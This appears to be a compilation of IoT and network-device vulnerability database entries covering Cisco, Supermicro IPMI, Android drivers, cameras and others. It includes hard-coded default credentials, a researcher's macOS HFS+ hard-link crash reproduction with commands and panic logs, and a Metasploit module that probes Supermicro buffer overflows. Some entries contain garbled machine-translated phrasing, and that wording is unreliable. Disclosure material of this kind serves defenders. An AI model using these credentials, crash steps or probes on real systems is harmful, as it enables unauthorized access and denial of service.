VARIoT IoT vulnerabilities database

The Belkin NetCam Wi-Fi Camera online video stream is accessible to the admin/admin account via a username and password, allowing an attacker to exploit the vulnerability to gain unauthorized access to sensitive information. This account information cannot be changed by the user. Belkin NetCam Wi-Fi Camera with Night Vision is a wireless network camera product with night vision function from Belkin. A security bypass vulnerability exists in Belkin NetCam Wi-Fi Camera with Night Vision, which originates from the use of hard-coded certificates for programs. A remote attacker could use this vulnerability to bypass security restrictions and gain access

The MikroTik RouterOS software turns a standard PC into a network router. MikroTik RouterOS has a default administrative account 'admin' with a blank password that allows remote attackers to use this account to gain unauthorized access to this setting.

NEC VOIP Phones is a VoIP phone device. NEC VOIP Phones has a default management account 'ADMIN' and a password of '632379', which allows remote attackers to use this account to gain unauthorized access to this setting.

Cross-site scripting (XSS) vulnerability in the Local Management Interface (LMI) in IBM Security Network Protection on XGS 5100 devices with firmware 5.1 before 5.1.0.6 and 5.1.1 before 5.1.1.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM Security Network Protection is a device of the IBM Security Intrusion Prevention product portfolio. An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. The system can monitor application usage, website access and operation execution within the network to avoid threats such as malware and botnets

The auto-update implementation in Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 and earlier allows remote attackers to cause a denial of service (device reload) via crafted update data, aka Bug ID CSCui33308. Attackers can exploit this issue to cause an affected device to reload, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCui33308

The phone-proxy implementation in Cisco Adaptive Security Appliance (ASA) Software 9.0.3.6 and earlier does not properly validate X.509 certificates, which allows remote attackers to cause a denial of service (connection-database corruption) via an invalid entry, aka Bug ID CSCui33299. Vendors have confirmed this vulnerability Bug ID CSCui33299 It is released as.Denial of service operation by a third party via invalid entry ( Connection database corruption ) There is a possibility of being put into a state. Cisco Adaptive Security Appliance (ASA) is prone to a security-bypass vulnerability. Successfully exploiting this issue will allow attackers to bypass security restrictions like insert an invalid entry into the phone proxy connection database. This issue is tracked by Cisco Bug ID's CSCui33299. The vulnerability stems from the fact that the phone proxy connection database does not properly handle untrusted certificates

Apple Mac OS X 10.9 allows local users to cause a denial of service (memory corruption or panic) by creating a hard link to a directory. NOTE: this vulnerability exists because of an incomplete fix for CVE-2010-0105. Exploiting this issue allows local, unprivileged users to crash the affected system, denying further service to legitimate users. MacOSX/XNU HFS Multiple Vulnerabilities Maksymilian Arciemowicz http://cxsecurity.com/ http://cifrex.org/ =================== On November 8th, I've reported vulnerability in hard links for HFS+ (CVE-2013-6799) http://cxsecurity.com/issue/WLB-2013110059 The HFS+ file system does not apply strict privilege rules during the creating of hard links. The ability to create hard links to directories is wrong implemented and such an issue is affecting os versions greater or equal to 10.5. Officially Apple allows you to create hard links only for your time machine. To create N hard links, you must use a special algorithm which creates links from the top of the file system tree. This means that first we create the directory structure and once created we need to go from up to down by creating hard links. The last time I've mentioned of the possibility of a kernel crash by performing the 'ls' command. This situation occurs in conjunction with the 'find' application. Commands such as 'ls' behave in unexpected ways. Apple are going find this crash point in code. To create huge hard links structure, use this code http://cert.cx/stuff/l2.c ----------------------------------- h1XSS:tysiak cx$ uname -a Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16 19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64 h1xss:tysiak cx$ gcc -o l2 l2.c h1xss:tysiak cx$ ./l2 1000 ... h1xss:tysiak cx$ cat loop.sh #!/bin/bash while [ 1 ] ; do ls -laR B > /dev/null done h1xss:tysiak cx$ sh ./loop.sh ls: B: No such file or directory ls: X1: No such file or directory ... ls: X8: Bad address ls: X1: Bad address ls: X2: Bad address ... ls: X8: No such file or directory ./loop.sh: line 4: 8816 Segmentation fault: 11 ls -laR B > /dev/null ./loop.sh: line 4: 8818 Segmentation fault: 11 ls -laR B > /dev/null ls: B: No such file or directory ls: X1: No such file or directory ls: X2: No such file or directory ... ls: X1: No such file or directory ls: X2: No such file or directory ----------- ... ----------- Feb 9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for ls[9418] version 230 to /Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash ----------- That what we can see here is unexpected behavior of LS command. LS process is also affected for infinite loop (recursion?). ----------- h1xss:tysiak cx$ ps -fp 8822 UID PID PPID C STIME TTY TIME CMD 501 8822 8810 0 7:36 ttys002 62:19.65 ls -laR B ----------- or used parallely with (find . > /dev/null) command cause a kernel crash ----------- Mon Mar 31 20:30:41 2014 panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838, type 13=general protection, registers: CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c, CR4: 0x00000000001606e0 RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000, RDX: 0x0000000000000000 RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018, RDI: 0xffffff802f23bcd0 R8: 0xffffff8140d9bc1c, R9: 0xffffff802f26e960, R10: 0xffffff8140d9ba2c, R11: 0x0000000000000f92 R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0, R15: 0xffffff802f26e960 RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS: 0x0000000000000008, SS: 0x0000000000000010 Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU: 0x0 Backtrace (CPU 0), Frame : Return Address 0xffffff811eee8c50 : 0xffffff8004422fa9 BSD process name corresponding to current thread: ls ----------- XNU is the computer operating system kernel that Apple Inc. acquired and developed for use in the Mac OS X operating system and released as free and open source software as part of the Darwin operating system. We can try to see HFS implementation code. Let's start static code analysys using cifrex.org tool! -1.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c --- hfs_vfsops.c ---------------------------- /* * HFS filesystem related variables. */ int hfs_sysctl(int *name, __unused u_int namelen, user_addr_t oldp, size_t *oldlenp, user_addr_t newp, size_t newlen, vfs_context_t context) { ... if ((newlen <= 0) || (newlen > MAXPATHLEN)) return (EINVAL); bufsize = MAX(newlen * 3, MAXPATHLEN); MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK); if (filename == NULL) { <===================================== filename CHECK error = ENOMEM; goto encodinghint_exit; } MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK); if (filename == NULL) { <====================================== double CHECK? error = ENOMEM; goto encodinghint_exit; } error = copyin(newp, (caddr_t)filename, newlen); if (error == 0) { error = utf8_decodestr((u_int8_t *)filename, newlen - 1, unicode_name, &bytes, bufsize, 0, UTF_DECOMPOSED); if (error == 0) { hint = hfs_pickencoding(unicode_name, bytes / 2); error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0, (int32_t *)&hint); } } --- hfs_vfsops.c---------------------------- Twice checking of 'filename' has no sense. Probably 'unicode_name' should be checked in second condition. -2.--------------------------------------------------------- Possible Buffer Overflow in resource fork (hfs_vnops.c) Unverified value returned by snprintf() may be bigger as a declared buffer (MAXPATHLEN). https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html --- The snprintf() and vsnprintf() functions will write at most n-1 of the characters printed into the out-put output put string (the n'th character then gets the terminating `\0'); if the return value is greater than or equal to the n argument, the string was too short and some of the printed characters were discarded. The output is always null-terminated. --- Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c --- hfs_vnops.c ---------------------------- ... /* * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode that is * found in 'vp'. The rsrc fork vnode is returned with the cnode locked and iocount * on the rsrc vnode. * ... */ int hfs_vgetrsrc(struct hfsmount *hfsmp, struct vnode *vp, struct vnode **rvpp, int can_drop_lock, int error_on_unlinked) { ... /* * Supply hfs_getnewvnode with a component name. */ cn.cn_pnbuf = NULL; if (descptr->cd_nameptr) { MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI, M_WAITOK); cn.cn_nameiop = LOOKUP; cn.cn_flags = ISLASTCN | HASBUF; cn.cn_context = NULL; cn.cn_pnlen = MAXPATHLEN; cn.cn_nameptr = cn.cn_pnbuf; cn.cn_hash = 0; cn.cn_consume = 0; cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN, <================ "%s%s", descptr->cd_nameptr, _PATH_RSRCFORKSPEC); } dvp = vnode_getparent(vp); error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL, <================ descptr, GNV_WANTRSRC | GNV_SKIPLOCK, &cp->c_attr, &rsrcfork, &rvp, &newvnode_flags); --- hfs_vnops.c ---------------------------- Pattern is '%s%s' where sum of length descptr->cd_nameptr and _PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN). Size of descptr->cd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is #define _PATH_RSRCFORKSPEC "/..namedfork/rsrc" where length is 17 chars. Possible up to 17 chars overflow here?. Now let's see hfs_getnewvnode function http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c --- hfs_cnode.c ---------------------------- hfs_getnewvnode( struct hfsmount *hfsmp, struct vnode *dvp, struct componentname *cnp, <======== WATCH THIS struct cat_desc *descp, int flags, struct cat_attr *attrp, struct cat_fork *forkp, struct vnode **vpp, int *out_flags) { ... if ((*vpp != NULL) && (cnp)) { /* we could be requesting the rsrc of a hardlink file... */ vnode_update_identity (*vpp, dvp, cnp->cn_nameptr, cnp->cn_namelen, cnp->cn_hash, <== NAMELEN HERE (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME)); ... --- hfs_cnode.c ---------------------------- and call to vnode_update_indentity() http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c --- vfs_cache.c ---------------------------- void vnode_update_identity(vnode_t vp, vnode_t dvp, const char *name, int name_len, uint32_t name_hashval, int flags) { ... if ( (flags & VNODE_UPDATE_NAME) ) { if (name != vp->v_name) { if (name && *name) { if (name_len == 0) name_len = strlen(name); tname = vfs_addname(name, name_len, name_hashval, 0); <== NAMELEN HERE } } else flags &= ~VNODE_UPDATE_NAME; } ... const char * vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags) { return (add_name_internal(name, len, hashval, FALSE, flags)); <== CALL } --- vfs_cache.c ---------------------------- And invalid memory reference in add_name_internal() --- vfs_cache.c ---------------------------- static const char * add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_extra_ref, __unused u_int flags) { struct stringhead *head; string_t *entry; uint32_t chain_len = 0; uint32_t hash_index; uint32_t lock_index; char *ptr; /* * if the length already accounts for the null-byte, then * subtract one so later on we don't index past the end * of the string. */ if (len > 0 && name[len-1] == '\0') { <===== INVALID MEMORY REFERENCE len--; } if (hashval == 0) { hashval = hash_string(name, len); } --- vfs_cache.c ---------------------------- -3.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not only Please pay attention that a buffer length check (stored in some variable) should be performed; also return from *alloc() function family should be verified for possible NULL pointers. Here are a few FALSE / POSITIVE examples. http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c --- hfs_catalog.c ---------------------------- /* * builddesc - build a cnode descriptor from an HFS+ key */ static int builddesc(const HFSPlusCatalogKey *key, cnid_t cnid, u_int32_t hint, u_int32_t encoding, int isdir, struct cat_desc *descp) { int result = 0; unsigned char * nameptr; size_t bufsize; size_t utf8len; unsigned char tmpbuff[128]; /* guess a size... */ bufsize = (3 * key->nodeName.length) + 1; if (bufsize >= sizeof(tmpbuff) - 1) { <============================ MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <= MALLOC FAIL } else { nameptr = &tmpbuff[0]; } result = utf8_encodestr(key->nodeName.unicode, key->nodeName.length * sizeof(UniChar), nameptr, (size_t *)&utf8len, <============================ ... maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) / SMALL_DIRENTRY_SIZE)); bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(*iterator); if (extended) { bufsize += 2*sizeof(struct direntry); } MALLOC(buffer, void *, bufsize, M_TEMP, M_WAITOK); <============================ bzero(buffer, bufsize); ... FREE(nameptr, M_TEMP); MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <============== result = utf8_encodestr(key->nodeName.unicode, key->nodeName.length * sizeof(UniChar), nameptr, (size_t *)&utf8len, bufsize, ':', 0); } ... cnp = (const CatalogName *)&ckp->hfsPlus.nodeName; bufsize = 1 + utf8_encodelen(cnp->ustr.unicode, cnp->ustr.length * sizeof(UniChar), ':', 0); MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); <======== result = utf8_encodestr(cnp->ustr.unicode, cnp->ustr.length * sizeof(UniChar), new_nameptr, &tmp_namelen, bufsize, ':', 0); --- hfs_catalog.c ---------------------------- The above examples does not look nice, too. Are you among them is the crux of the problem applications and kernel crash? I informed Apple of those possible errors, it has passed more than a month and I still have not received any comment nor solution. --- 1. References --- http://cxsecurity.com/issue/WLB-2014040027 http://cxsecurity.com/cveshow/CVE-2013-6799/ http://cxsecurity.com/cveshow/CVE-2010-0105/ --- 2. Greetz --- Kacper George and Michal --- 3. Credit --- Maksymilian Arciemowicz http://cxsecurity.com/ http://cifrex.org/ http://cert.cx/ Best regards, CXSEC TEAM http://cxsec.org/

SAP is a world-renowned provider of enterprise management and collaborative business solutions. SQL injection attacks exist for multiple SAP products. The vulnerability is due to the incorrect filtering of user-submitted input by CRM Internet Sales and CRM Internet Service web applications, allowing remote attackers to exploit or exploit SQL queries to the back-end database to manipulate or retrieve database information

The HTTPSTK service in the novell-nrm package before 2.0.2-297.305.302.3 in Novell Open Enterprise Server 2 (OES 2) Linux, and OES 11 Linux Gold and SP1, does not make the intended SSL_free and SSL_shutdown calls for the close of a TCP connection, which allows remote attackers to cause a denial of service (service crash) by establishing many TCP connections to port 8009. Novell Remote Manager is prone to a vulnerability that may allow attackers to cause a denial-of-service condition. Successful exploits may allow the attacker to crash the affected application causing denial-of-service conditions. Versions prior to Novell Remote Manager 2.0.2-297.305.302.3 are vulnerable

Cross-site scripting (XSS) vulnerability in the web interface "WiFi scan" option in FOSCAM Wireless IP Cameras allows remote attackers to inject arbitrary web script or HTML via the SSID. The FOSCAM Wireless IP Camera is a wireless IP camera. FOSCAM Wireless IP Camera is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks

goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, relies on user-space length values for kernel-memory copies of procfs file content, which allows attackers to gain privileges or cause a denial of service (memory corruption) via an application that provides crafted values. Android For MSM is prone to multiple local memory-corruption vulnerabilities that occur in the Goodix GT915 touchscreen driver because it fails to properly bounds-check user-supplied data. Local attackers can exploit these issues to execute arbitrary code. Failed exploit attempts may cause a denial-of-service condition. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. There is a security vulnerability in the goodix_tool.c file in the goodix gt915 touch screen driver of the Linux kernel 3.x version using the Android system. The issues were found in the write handler of the procfs entry created by the driver, which by default is readable and writeable to users without any specific privileges. CVE-2013-4740 ------------- When processing data written to the procfs file, the Goodix gt915 touchscreen driver is using user space supplied content as length values in subsequent memory manipulation operations without bounds checking. This can lead to multiple memory corruption issues. An application with access to the respective file can use this flaw to, e.g., elevate privileges. Access Vector: local Security Risk: high Vulnerability: CWE-20 (Improper Input Validation) CVE-2013-6122 ------------- When processing arguments passed to the procfs write handler of the Goodix gt915 touchscreen driver, user space data is copied to a global variable and used without a mutual-exclusion mechanism. The global structure used by the procfs write handler can be accessed concurrently by more than one process. This would allow local attackers to bypass the input validation checks (such as introduced by the fix for CVE-2013-4740). An application with access to the respective file can use this flaw to, e.g., alter the internal state of the handler, bypass security checks, or create a denial-of-service condition. Access Vector: local Security Risk: medium Vulnerability: CWE-362 (Concurrent Execution using Shared Resource with Improper Synchronization) Affected versions ----------------- All Android releases from CAF using a Linux kernel from the following heads: - jb_3* - msm-3.10 Patch ----- We advise customers to apply the following patches: https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05 Acknowledgement =============== Qualcomm Innovation Center, Inc. (QuIC) thanks Jonathan Salwan of the Sysdream Security Lab for reporting the related issues and working with QuIC to help improve Android device security. https://www.codeaurora.org/projects/security-advisories/multiple-memory-corruption-issues-and-race-condition-goodix-gt915-touchscreen-driver-procfs-handler

goodix_tool.c in the Goodix gt915 touchscreen driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, does not properly synchronize updates to a global variable, which allows local users to bypass intended access restrictions or cause a denial of service (memory corruption) via crafted arguments to the procfs write handler. Android For MSM project is prone to a local security-bypass vulnerability because it fails to sufficiently validate user-supplied input. An attacker with physical access to the computer can exploit this issue to bypass security restrictions that may aid in further attacks. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. There is a buffer overflow vulnerability in the goodix_tool.c file in the goodix gt915 touch screen driver of the Linux kernel 3.x version using the Android system. The vulnerability comes from the fact that the program does not correctly synchronize the updated global variables. Description =========== Multiple issues have been identified in the Goodix gt915 touchscreen driver for Android. The issues were found in the write handler of the procfs entry created by the driver, which by default is readable and writeable to users without any specific privileges. CVE-2013-4740 ------------- When processing data written to the procfs file, the Goodix gt915 touchscreen driver is using user space supplied content as length values in subsequent memory manipulation operations without bounds checking. This can lead to multiple memory corruption issues. An application with access to the respective file can use this flaw to, e.g., elevate privileges. The global structure used by the procfs write handler can be accessed concurrently by more than one process. This would allow local attackers to bypass the input validation checks (such as introduced by the fix for CVE-2013-4740). An application with access to the respective file can use this flaw to, e.g., alter the internal state of the handler, bypass security checks, or create a denial-of-service condition. Access Vector: local Security Risk: medium Vulnerability: CWE-362 (Concurrent Execution using Shared Resource with Improper Synchronization) Affected versions ----------------- All Android releases from CAF using a Linux kernel from the following heads: - jb_3* - msm-3.10 Patch ----- We advise customers to apply the following patches: https://www.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=f53bcf29a6e7a66b3d935b8d562fa00829261f05 Acknowledgement =============== Qualcomm Innovation Center, Inc. (QuIC) thanks Jonathan Salwan of the Sysdream Security Lab for reporting the related issues and working with QuIC to help improve Android device security. https://www.codeaurora.org/projects/security-advisories/multiple-memory-corruption-issues-and-race-condition-goodix-gt915-touchscreen-driver-procfs-handler

Directory traversal vulnerability in the web-management interface in the server in Cisco Wide Area Application Services (WAAS) Mobile before 3.5.5 allows remote attackers to upload and execute arbitrary files via a crafted POST request, aka Bug ID CSCuh69773. Vendors have confirmed this vulnerability Bug ID CSCuh69773 It is released as.Skillfully crafted by a third party POST Any file may be uploaded and executed via a request. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of CAB files uploaded through ReportReceiver. By uploading a crafted CAB file, an attacker is able to add a hostile web page to the web server. Using this, an attacker is able to run arbitrary code as either DefaultAppPool or NetworkService, depending on the operating system version. Failed exploit attempts may result in a denial-of-service condition. This issue is being tracked by Cisco bug ID CSCuh69773. The vulnerability stems from the fact that the program does not correctly handle HTTP POST requests

Buffer overflow in logout.cgi in the Intelligent Platform Management Interface (IPMI) with firmware before 3.15 (SMT_X9_315) on Supermicro X9 generation motherboards allows remote authenticated users to execute arbitrary code via the SID parameter. Supermicro IPMI is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers may be able to execute arbitrary code with root privileges in the context of the affected firmware. Failed exploit attempts will likely result in denial-of-service conditions. Supermicro IPMI running firmware versions prior to SMT_X9_315 are vulnerable. Supermicro Intelligent Platform Management Interface (IPMI) is an IPMI card (Intelligent Platform Management Interface) of Supermicro, which can remotely control the system, such as remote booting, entering BIOS, etc

Multiple memory leaks in Cisco IOS 15.1 before 15.1(4)M7 allow remote attackers to cause a denial of service (memory consumption or device reload) by sending a crafted SIP message over (1) IPv4 or (2) IPv6, aka Bug IDs CSCuc42558 and CSCug25383. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. The vulnerability is due to improper handling of specially crafted SIP messages. Cisco IOS is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected system to reload, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug ID CSCuc42558. The following releases are affected: Cisco IOS 15.1(4)GC, 15.1(4)GC1, 15.1(4)M4, 15.1(4)M5, 15.1(4)M6

The WIL-A module in Cisco TelePresence VX Clinical Assistant 1.2 before 1.21 changes the admin password to an empty password upon a reboot, which makes it easier for remote attackers to obtain access via the administrative interface, aka Bug ID CSCuj17238. Vendors have confirmed this vulnerability Bug ID CSCuj17238 It is released as.A third party may gain access through the administration interface. Exploiting this issue could allow an attacker to bypass certain security restrictions and perform unauthorized actions on the device running the vulnerable application. This issue is being tracked by Cisco Bug ID CSCuj17238. The system can provide remote diagnosis, virtual nursing, medical education and other functions through high-definition video. The vulnerability is caused by an error in the program's handling of administrative passwords. When the system is restarted, the software resets the admin password to an empty password. An attacker could exploit this vulnerability to gain administrative privileges by logging into the management interface

The OSPFv3 functionality in Cisco IOS XR 5.1 allows remote attackers to cause a denial of service (process crash) via a malformed LSA Type-1 packet, aka Bug ID CSCuj82176. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. An attacker can exploit this issue to cause the OSPFv3 process to crash on an affected device, resulting in a denial-of-service condition. This issue is being tracked by Cisco Bug IDs CSCuj82176. The vulnerability is caused by the program not correctly parsing LSA Type-1 packets

Cisco NX-OS 5.0 and earlier on MDS 9000 devices allows remote attackers to cause a denial of service (supervisor CPU consumption) via Authentication Header (AH) authentication in a Virtual Router Redundancy Protocol (VRRP) frame, aka Bug ID CSCte27874. Cisco MDS 9000 Runs on the device Cisco NX-OS There is a service disruption ( Supervisor CPU Resource consumption ) There are vulnerabilities that are put into a state. Cisco MDS 9000 NX-OS Software is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause the device to consume excessive CPU resources, resulting in denial-of-service conditions. This issue is being tracked by Cisco bug ID CSCte27874. Cisco NX-OS is a data center-oriented operating system developed by Cisco. The vulnerability is caused by the program not correctly handling Virtual Router Redundancy Protocol (VRRP) packets

Multiple stack-based buffer overflows in cgi/close_window.cgi in the web interface in the Intelligent Platform Management Interface (IPMI) with firmware before 3.15 (SMT_X9_315) on Supermicro X9 generation motherboards allow remote attackers to execute arbitrary code via the (1) sess_sid or (2) ACT parameter. Supermicro IPMI is prone to multiple buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. Attackers may be able to execute arbitrary code in the context of the affected firmware. Failed exploit attempts will likely result in denial-of-service conditions. Supermicro IPMI running firmware version SMT_X9_226 is vulnerable. Supermicro Intelligent Platform Management Interface (IPMI) is an IPMI card (Intelligent Platform Management Interface) of Supermicro, which can remotely control the system, such as remote booting, entering BIOS, etc. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'uri' class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Supermicro Onboard IPMI CGI Vulnerability Scanner', 'Description' => %q{ This module checks for known vulnerabilities in the CGI applications of Supermicro Onboard IPMI controllers. These issues currently include several unauthenticated buffer overflows in the login.cgi and close_window.cgi components. }, 'Author' => [ 'hdm', # Discovery and analysis 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-3621' ], [ 'CVE', '2013-3623' ], [ 'URL', 'https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/'] ], 'DisclosureDate' => '2013-11-06')) end def is_supermicro? res = send_request_cgi( { "uri" => "/", "method" => "GET" }) if res and res.code == 200 and res.body.to_s =~ /ATEN International Co Ltd\./ return true else return false end end def send_close_window_request(sess) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi/close_window.cgi", 'encode_params' => false, 'vars_post' => { 'sess_sid' => sess } }) return res end def check_close_window safe_check = Rex::Text.rand_text_alpha(20) trigger_check = Rex::Text.rand_text_alpha(132) res = send_close_window_request(safe_check) unless res and res.code == 200 and res.body.to_s =~ /Can't find action/ return false end res = send_close_window_request(trigger_check) unless res and res.code == 500 return false end return true end def send_login_request(name) res = send_request_cgi({ 'method' => 'POST', 'uri' => "/cgi/login.cgi", 'encode_params' => false, 'vars_post' => { 'name' => name, 'pwd' => Rex::Text.rand_text_alpha(4) } }) return res end def check_login safe_check = Rex::Text.rand_text_alpha(20) trigger_check = Rex::Text.rand_text_alpha(300) res = send_login_request(safe_check) unless res and res.code == 200 and res.body.to_s =~ /ATEN International Co Ltd\./ and res.body.to_s =~ /top\.location\.href = location\.href/ return false end res = send_login_request(trigger_check) unless res and res.code == 500 return false end return true end def run_host(ip) vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? vprint_good("Supermicro IPMI web interface found") else vprint_error("Supermicro IPMI web interface not found") return end vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, :proto => 'tcp', :name => "Supermicro Onboard IPMI login.cgi Buffer Overflow", :refs => self.references.select do |ref| ref.ctx_val == "2013-3621" end }) end vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, :proto => 'tcp', :name => "Supermicro Onboard IPMI close_window.cgi Buffer Overflow", :refs => self.references.select { |ref| ref.ctx_val == "2013-3623" } }) end end end

Multiple Vivotek IP Cameras remote authentication bypass that could allow access to the video stream. Vivotek IP Camera Contains an incorrect authentication vulnerability.Information may be obtained. Vivotek IP cameras are webcam devices. An attacker can exploit this issue to bypass the authentication mechanism and gain unauthorized access to the restricted functionality of the device